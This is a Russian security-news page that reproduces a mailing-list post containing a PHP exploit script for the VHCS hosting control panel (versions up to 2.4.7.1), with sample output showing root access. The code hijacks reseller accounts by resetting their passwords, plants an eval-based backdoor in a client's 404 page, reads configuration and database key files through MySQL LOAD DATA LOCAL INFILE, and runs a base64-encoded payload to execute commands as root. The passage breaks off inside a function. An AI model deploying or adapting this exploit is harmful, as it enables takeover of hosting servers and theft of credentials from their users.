Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  PHP-Nuke  SQL injection Module "Hadith"  [cat]

  [ GLSA 200803-15 ] phpMyAdmin: SQL injection vulnerability

  [SECURITY] [DSA 1514-1] New moin packages fix several vulnerabilities

From:gmdarkfig_(at)_gmail.com <gmdarkfig_(at)_gmail.com>
Date:10 марта 2008 г.
Subject:VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit

#!/usr/bin/php -q
<?php
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');

# [email protected]:/# ./vhcs_sploit.php -url http://localhost/vhcs2/
#
#  VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
#  --------------------------------------------------
#
# About:
#  by DarkFig < gmdarkfig (at) gmail (dot) com >
#  http://acid-root.new.fr/
#  #[email protected]
#
# Exploit:
#  + Logged in (Administrator)
#  + The administrator has 2 resellers
#  / Changing dareseller's password
#  / Trying to connect as dareseller:thatpwnz
#  + Login successful
#  + The reseller has 2 users
#  + Host domaintest.fr is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host domaintest.fr isn't a valid user
#  + Host xpliamaclient.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host xpliamaclient.com isn't a valid user
#  / Changing unautresel's password
#  / Trying to connect as unautresel:thatpwnz
#  + Login successful
#  + The reseller has 1 users
#  + Host thegoodone.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  / Trying to create a database
#  + Database 92xpl_db39 successfully created
#  + Using database id 12
#  / Trying to add SQL user
#  + User 93xpl_usr2 successfully created
#  + Using SQL user id 17
#  + Host thegoodone.com is a valid user
#  + Logged in (thegoodone.com - Client)
#  / Trying to load files via local_infile
#  + Ok: /etc/vhcs2/vhcs2.conf
#  + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
#  + Now you can execute commands as root =]
#  + [email protected]: id
#
# uid=0(root) gid=0(root)
#

class vhcs_xpl extends phpsploit
{
       var $sleep_time = 4;

       #  -rw-r--r-- 1 root root
       var $conf_path = '/etc/vhcs2/vhcs2.conf';

       # -r-------- 1 www-data www-data
       var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';

       var $head_arr = array(
           'admin/index.php'       => 3,
           'reseller/index.php'    => 2,
           '../reseller/index.php' => 2,
           'client/index.php'      => 1,
           ''                      => 0);

       var $privileges = array(
           3 => 'Administrator',
           2 => 'Reseller',
           1 => 'Client');

       var $reg_arr = array(
           1 => '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) </a> </td>#i',
           2 => '#edit_user.php\?edit_id=([0-9]+)" class="link">(.*)</a></td>#i',
           3 => '#delete_sql_database\.php\?id=([0-9]+)#i',
           4 => '#delete_sql_database\.php\?id=([0-9]+)#i',
           5 => '#sql_execute_query.php\?id=([0-9]+)#i');

       var $flags = array(
          -1 => '-',
           0 => '/',
           1 => '+');

       function main()
       {
               $this->agent('Mozilla Firefox');
               $this->cookiejar(1);

               $this->mhead();

               $this->uri      = $this->getparam('url', TRUE);
               $this->url_arr  = parse_url($this->uri);

               $this->patch = $this->getparam('patch');
               $this->proxh = $this->getparam('proxhost');
               $this->proxa = $this->getparam('proxauth');

               if($this->proxh)
                  $this->proxy($this->proxh);

               if($this->proxa)
                  $this->proxyauth($this->proxa);

               print "\nExploit:";
               $this->type = $this->login();

               if(empty($this->type))
               {
                       if(!$this->patch)
                       {
                               $this->msg('A patch has been applied to this website', -1);
                               $this->msg("See RoMaNSoFt's advisory for more details", -1);
                               $this->msg('Try with the -patch option', -1, 1);
                       }
                       else
                          $this->msg('Bad username/password', -1, 1);
               }

               $this->msg("Logged in (".$this->usr.' - '.$this->privileges[$this->type].')', 1);

               $this->allowredirection(1);

               $this->get_vhcs_conf();

               $this->exec_cmd();

               return;
       }


       function getparam($param, $nec=FALSE)
       {
               global $argv;

               foreach($argv as $value => $key)
               {
                       if($key === '-'.$param)
                          return $argv[$value+1];
               }

               if($nec)
                  $this->usage();
               
               return FALSE;
       }

       function mhead()
       {
               print "\n VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit";
               print "\n --------------------------------------------------\n";
               print "\nAbout:";
               print "\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
               print "\n http://acid-root.new.fr/";
               print "\n #[email protected]";
               print "\n";
       
               return;
       }
       
       function usage()
       {
               print "\nUsage:";
               print "\n vhcsxpl.php -url <url> [options...]\n";
               print "\nOptions:";
               print "\n -patch <user:pwd>     Unofficial patch applied";
               print "\n -proxhost <ip>        If you wanna use a proxy";
               print "\n -proxauth <usr:pwd>   Proxy with authentication\n";
               print "\n";
       
               exit(1);
       }

       function log_as()
       {
               $this->msg("Trying to connect as ".$this->usr.':'.$this->pwd, 0);
               $this->allowredirection(1);

               $this->post($this->uri.'chk_login.php',
               'uname='.$this->usr.'&upass='.$this-
>pwd.'&Submit=+++Login+++');

               $this->redir_type = $this->get_type_by_redir();

               if($this->redir_type == 0)
                  $this->msg('Login attempt failed', -1);

               else
                  $this->msg('Login successful', 1);

               return $this->redir_type;
       }

       function get_type_by_redir()
       {
               $this->redir_arr = parse_url($this->last_redirection);
                       
               $this->allowredirection(0);

               return $this->head_arr[$this->redir_arr['path']];
       }
       
       function login()
       {
               if($this->patch)
               {
                       $this->idents = explode(':', $this->patch);
                       list($this->usr, $this->pwd) =  $this->idents;

                       $this->type = $this->log_as();

                       return $this->log_as_user();
               }
               else
               {
                       $this->get($this->uri.'admin/manage_users.
php');

                       $this->type = 3;

                       if(ereg('add_user\.php', $this->getcontent()))
                          return $this->log_as_user();

                       else
                          return 0;
               }
       }

       function log_as_user()
       {
               if($this->type == 3)
                  $this->logged_as_admin();

               if($this->type == 2)
                  $this->logged_as_reseller();

               if($this->type == 1)
               {
                       if(!$this->patch)
                          return 1;

                       else
                          return $this->valid_user();
               }

               else
                  return 0;
       }

       function valid_user()
       {
               if($this->write_code())
               {
                       # open_basedir + safe_mode
                       if($this->is_safe())
                       {
                               if($this->bypass_with_db())
                                  return 1;

                               else
                                  return 0;
                       }
                       else
                          return 1;
               }
               return 0;               
       }

       function logged_as_admin()
       {
               $this->msg('Logged in ('.$this->privileges[3].')', 1);

               $this->get($this->uri.'admin/manage_users.
php');

               preg_match_all($this->reg_arr[1], $this->getcontent(), $resellers);

               $this->reseller_count = count($resellers[1]);

               $this->msg('The administrator has '.$this->reseller_count.' resellers', 1);

               for($i=0; $i<$this->reseller_count; $i++)
               {       
                       $this->usr = $resellers[2][$i];
                       $this->pwd = 'thatpwnz';

                       if(!$this->patch)
                       {
                               $this->msg('Changing '.$resellers[2][$i]."'s password", 0);

                               $this->reseller_dat = '';

                               $this->get($this->uri.
'admin/edit_reseller.php?edit_id='.$resellers[1][$i]);

                               # only checked ip
                               preg_match_all('#name="ip_([0-
9]+)" value="asgned" checked#i',
                               $this->getcontent(), $reseller_ips);

                               $this->ip_count = count($reseller_ips[1]);
                               $this->ip_dat = '';

                               for($j=0; $j<$this->ip_count; $j++)
                               {
                                       $this->ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned';

                                       if($j != $this->ip_count-1)
                                          $this->ip_dat .= '&';
                               }

                               # Change reseller's password/mail
                               # This is needed if it was run without -path
                               # Because we can't click on the 'Change' button.
                               #
                               # pwd: thatpwnz
                               # mail: <reseller_name>@ohyeah.com
                               #
                               $this->post($this->uri.
'admin/edit_reseller.php',
                               'username='.$resellers[2][$i].
'&pass=thatpwnz&'.
                               'pass_rep=thatpwnz&email='.
$resellers[2][$i].''.
                               '%40ohyeah.
com&nreseller_max_domain_cnt=0&nres'.
                               'eller_max_subdomain_cnt=0&nreseller_max_a
lias'.
                               '_cnt=0&nreseller_max_mail_cnt=0&nrese
ller_max'.
                               '_ftp_cnt=0&nreseller_max_sql_db_cnt=0&
nresell'.
                               'er_max_sql_user_cnt=0&nreseller_max_traff
ic=0'.
                               '&nreseller_max_disk=0&'.$this-
>ip_dat.'&custo'.
                               'mer_id=&fname=&lname=&firm=&z
ip=&city=&countr'.
                               'y=&street1=&street2=&phone=&f
ax=&Submit=++Upd'.
                               'ate++&uaction=update_reseller&edit_id
='.
                               $resellers[1][$i].'&edit_username='.
                               $resellers[2][$i]);

                               if($this->log_as() != 2)
                                  return 0;
                       }
                       else
                       {
                               $this->allowredirection(1);

                               $this->get($this->uri.
'admin/change_user_interface.php?to_id='.$resellers[1][$i]);

                               if($this->get_type_by_redir() != 2)
                                  return 0;
                       }

                       if($this->logged_as_reseller())
                          return 1;

                       $this->reset('cookie');
                       $this->get($this->uri.
'reseller/change_user_interface.php?action=go_back');
               }

               return 0;
       }

       function logged_as_reseller()
       {
               $this->get($this->uri.'reseller/users.
php');

               preg_match_all($this->reg_arr[2], $this->getcontent(), $users);
               
               array_walk($users[2], 'trim');
               
               $this->user_count = count($users[1]);
               
               $this->msg('The reseller has '.$this->user_count. ' users', 1);

               $this->patch = FALSE;

               for($i=0; $i<$this->user_count; $i++)
               {
                       if($this->is_alive($users[2][$i]))
                       {
                               $this->usr = $users[2][$i];

                               $this->type = 1;

                               $this->msg('Host '.$this->usr.' is connected', 1);

                               $this->get($this->uri.
'reseller/change_user_interface.php?to_id='.$users[1][$i]);

                               if($this->valid_user())
                               {
                                       $this->msg('Host '.$this->usr.' is a valid user', 1);
                                       return TRUE;
                               }
                               else
                                  $this->msg("Host ".$this->usr." isn't a valid user", 0);
                       }
                       else
                          $this->msg('Host '.$users[2][$i].' seems down', -1);

                       $this->get($this->uri.
'client/change_user_interface.php?action=go_back');
               }

               return FALSE;
       }

       function bypass_with_db()
       {
               $this->get($this->dmn_vhcs_url.'client/index.
php');

               if(!ereg('manage_sql.php', $this->getcontent()) and !$edit)
               {
                       $this->msg("User ".$this->ur." doesn't have SQL rights", -1);

                       return FALSE;
               }
               
               # No database
               if(!$this->got_db())
               {
                       $this->msg('Trying to create a database', 0);

                       $this->tmp_db_name = rand(0,100).'xpl_db'.rand(0,100);

                       # Database: ..xpl_db..
                       $this->post($this->dmn_vhcs_url.
'client/add_sql_database.php',
                       'db_name='.$this->tmp_db_name.
'&id_pos=start&Submit=++Add++&'.
                       'uaction=add_db');

                       if($this->got_db())
                          $this->msg('Database '.$this->tmp_db_name.' successfully created', 1);

                       else
                       {
                               $this->msg("Can't create the database ".$this->tmp_db_name, 0);

                               return FALSE;
                       }
               }

               # First database
               $this->db_id = $this->sql_db_ids[1];

               $this->msg('Using database id '.$this->db_id, 1);

               if(!$this->got_db_user())
               {
                       $this->msg('Trying to add SQL user', 0);

                       $this->tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100);
                       
                       # SQL user: ..xpl_usr..:xpl_pwd
                       $this->post($this->dmn_vhcs_url.
'client/sql_add_user.php',
                       'user_name='.$this->tmp_db_user.
'&id_pos=end&pass=xpl_pw'.
                       'd&pass_rep=xpl_pwd&Add_New=++Add++&uactio
n=add_user&id='.
                       $this->db_id);

                       if($this->got_db_user())
                          $this->msg('User '.$this->tmp_db_user.' successfully created', 1);

                       else
                       {
                               $this->msg("Can't create the SQL user ".$this->tmp_db_user, 0);

                               return FALSE;
                       }
               }

               # First SQL user id associed with the database
               $this->db_user_id = $this->sql_usrs[1];

               $this->msg('Using SQL user id '.$this->db_user_id, 1);

               return TRUE;
       }

       function got_db_user()
       {               
               $this->get($this->dmn_vhcs_url.'client/manage_sql.
php');

               $this->content_arr = explode("\n", $this->getcontent());

               $this->is_sql_db_usr = FALSE;

               for($i=0; $i<count($this->content_arr); $i++)
               {
                       if(preg_match($this->reg_arr[4],
                       $this->content_arr[$i], $this->sql_db_id))
                       {
                               if($this->sql_db_id[1] == $this->db_id)
                                  $this->is_sql_db_usr = TRUE;

                               else
                                  $this->is_sql_db_usr = FALSE;
                       }

                       if(preg_match($this->reg_arr[5],
                       $this->content_arr[$i], $this->sql_usrs))
                       {
                               if($this->is_sql_db_usr)
                                  return TRUE;
                       }
               }
               return FALSE;
       }

       function got_db()
       {       
               $this->get($this->dmn_vhcs_url.'client/manage_sql.
php');

               preg_match($this->reg_arr[3],
               $this->getcontent(), $this->sql_db_ids);

               if(empty($this->sql_db_ids))
                  return FALSE;

               else
                  return TRUE;
       }

       function is_alive($domain_name)
       {
               if(gethostbyname($domain_name) != $domain_name)
                  return TRUE;

               else
                  return FALSE;
       }

       function write_code()
       {
               $this->msg('Trying to write PHP code', 0);

               $this->dmn_url      = 'http://'.$this->usr;
               $this->dmn_vhcs_url = $this->dmn_url.$this->url_arr['path'];

               $this->get($this->dmn_url.'/errors/404/index.
php');
               $this->old_404 = $this->getcontent();

               $this->phpc =
                '<?php '
               .'error_reporting(0); '
               .
'if(isset($_SERVER[\'HTTP_SHELL\'])) '
               .'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } '
               .'?>';

               $this->new_404 = $this->phpc.$this->old_404;

               $this->post($this->dmn_vhcs_url.'client/error_pages.
php',
               'error='.urlencode($this->new_404).
'&uaction=updt_error&eid=404&Submit=+Save+');

               $this->exec_php('print "itworkz";');

               if(ereg('itworkz', $this->getcontent()))
               {
                       $this->msg('PHP code successfully written', 1);

                       return TRUE;
               }
               else
               {
                       $this->msg("Can't write PHP code", -1);

                       return FALSE;
               }
       }

       function get_vhcs_conf()
       {
               if($this->safe_mode)
                  $this->msg('Trying to load files via local_infile', 0);

               else
                  $this->msg('Trying to load files via shell_exec', 0);

               $this->lf_conf   = $this->path_content($this->conf_path);
               $this->lf_conf   = trim($this->lf_conf, "\r");

               $this->vhcs_conf = explode("\n", $this->lf_conf);

               $this->conf = array();

               foreach($this->vhcs_conf as $this->conf_line)
               {
                       # comment
                       if(!ereg('^(\s*)#', $this->conf_line))
                       {
                               $this->pos   = strpos($this->conf_line, '=');
                               $this->name  = strtoupper(trim(substr($this->conf_line, 0, $this->pos)));
                               $this->value = trim(substr($this->conf_line, $this->pos+1));

                               $this->conf[$this->name] = $this->value;
                       }
               }

               $this->php_keys_code = $this->path_content($this->keys_path);

               return;
       }

       function path_content($path)
       {
               # open_basedir On/off
               # safe_mode = Off
               if(!$this->safe_mode)
               {
                       $this->phpc = 'print shell_exec("cat '.$path.'");';

                       $this->exec_php($this->phpc);

                       $this->file_content = $this->getcontent();

               }

               # open_basedir On/Off
               # safe_mode = On
               else
               {
                       $this->rand_table = rand().'tmp_hax'.rand();

                       $this->sql_query =
                       "CREATE TABLE ".$this->rand_table." (content text not null); ".
                       "LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this->rand_table.
                       " FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT".
                       "ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,".
                       "84,69,78,84),HEX(content),CHAR(80,
87,78,69,68,67,79,78,84,69".
                       ",78,84)) FROM ".$this->rand_table."; DROP TABLE ".
                       $this->rand_table;

                       $this->sql_arr = explode(';', $this->sql_query);
                       $this->sql_cnt = count($this->sql_arr);

                       for($i=0; $i<$this->sql_cnt; $i++)
                       {
                               $this->sql_res = $this->exec_sql($this->sql_arr[$i]);

                               if($i == $this->sql_cnt-2)
                                  $this->file_content = $this->sql_res;
                       }
                       
               }

               if(!$this->file_content)
               {
                       $this->msg("A problem occurred while trying to read the file $path", -1);
                       
                       if($this->safe_mode)
                          $this->msg("local_infile=Off or we don't have sufficient access rights to the file", -1, 2);

                       else
                          $this->msg("We don't have sufficient access rights to the file", -1, -2);
               }
               else
                  $this->msg("Ok: $path", 1);

               return $this->file_content;
       }

       function exec_sql($query)
       {
               $this->post($this->dmn_vhcs_url.
'client/sql_execute_query.php',
               'user_name=&sql_query='.$query.
'&Submit=+Execute+&uaction=exe'.
               'cute_query&id='.$this->db_user_id);

               $this->sql_result = '';

               if(ereg('PWNEDCONTENT', $this->getcontent()))
               {
                       $this->sql_res_arr = explode('PWNEDCONTENT', $this->getcontent());

                       $this->sql_result  = pack('H*', $this->sql_res_arr[1]);
               }
       
               return $this->sql_result;
       }

       function is_safe()
       {
               $this->phpc =
               'if(in_array(strtoupper(ini_get("safe_mod
e")),array("ON","1")) '
              .'or !function_exists("shell_exec")) '
              .'{ print "safe_mode=on"; }';

               $this->exec_php($this->phpc);

               # open_basedir always set
               if(ereg('safe_mode=on', $this->getcontent()))
               {
                       $this->msg("We'll have to bypass open_basedir cause safe_mode=On", 0);

                       $this->safe_mode = TRUE;
               }
               else
               {
                       $this->msg('PHP configured with default safe_mode value (Off)', 0);

                       $this->safe_mode = FALSE;
               }

               return $this->safe_mode;
       }

       function exec_cmd()
       {
               $this->msg("Now you can execute commands as root =]", 1);

               $this->woot_code =
                'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG'
               .'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh'
               .'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU'
               .'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl'
               .'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm'
               .'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ'
               .'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID'
               .'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7'
               .'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ'
               .'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo'
               .'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC'
               .'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g'
               .'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG'
               .'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ'
               .'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX'
               .'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15'
               .'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH'
               .'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt'
               .'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX'
               .'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk'
               .'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3'
               .'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl'
               .'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi'
               .'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg'
               .'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm'
               .'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg'
               .'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2'
               .'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi'
               .'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi'
               .'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu'
               .'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX'
               .'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0'
               .'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG'
               .'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn'
               .'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy'
               .'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn'
               .'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG'
               .'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0'
               .'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX'
               .'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi'
               .'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG'
               .'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0'
               .'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX'
               .'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n'
               .'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi'
               .'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N'
               .'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG'
               .'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt'
               .'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU'
               .'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL'
               .'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn'
               .'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go'
               .'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH'
               .'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu'
               .'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3'
               .'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf'
               .'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX'
               .'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf'
               .'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW'
               .'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs'
               .'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC'
               .'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg'
               .'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW'
               .'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs'
               .'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1'
               .'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv'
               .'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2'
               .'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg'
               .'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG'
               .'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj'
               .'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC'
               .'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv'
               .'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC'
               .'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg'
               .'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm'
               .'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl'
               .'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC'
               .'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9'
               .'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC'
               .'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk'
               .'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw'
               .'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy'
               .'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy'
               .'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM'
               .'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW'
               .'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v'
               .'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW'
               .'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk'
               .'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi'
               .'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg'
               .'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW'
               .'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0'
               .'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS'
               .'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy'
               .'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj'
               .'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz'
               .'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS'
               .'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy'
               .'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH'
               .'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK'
               .'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn'
               .'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg'
               .'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW'
               .'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy'
               .'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX'
               .'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf'
               .'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG'
               .'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK'
               .'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew'
               .'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg'
               .'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX'
               .'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog'
               .'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC'
               .'RsaW5lOw0KfQo/Pgo=';

               while($this->cmd_prompt())
               {
                       $this->exec_php('print $_SERVER["DOCUMENT_ROOT"];');
                       $this->tmp_file = $this->getcontent().'/'.md5(rand());

                       $this->set_hvar('db-host',    $this->conf['DATABASE_HOST']);
                       $this->set_hvar('db-user',    $this->conf['DATABASE_USER']);
                       $this->set_hvar('db-pass',    $this->conf['DATABASE_PASSWORD']);
                       $this->set_hvar('db-name',    $this->conf['DATABASE_NAME']);

                       $this->set_hvar('sleep-time', $this->sleep_time);
                       $this->set_hvar('file',       $this->tmp_file);
                       $this->set_hvar('cmd',        $this->cmd);
                       $this->set_hvar('version',    $this->conf['Version']);
                       
                       $this->set_hvar('php-keys',   '?>'.$this->php_keys_code);

                       $this->exec_php('?>'.
base64_decode($this->woot_code));

                       print "\n".$this->getcontent();
               }

               exit(0);
       }

       function set_hvar($name, $value)
       {
               $this->addheader('Sploit-'.$name, base64_encode($value));

               return;
       }

       function cmd_prompt()
       {
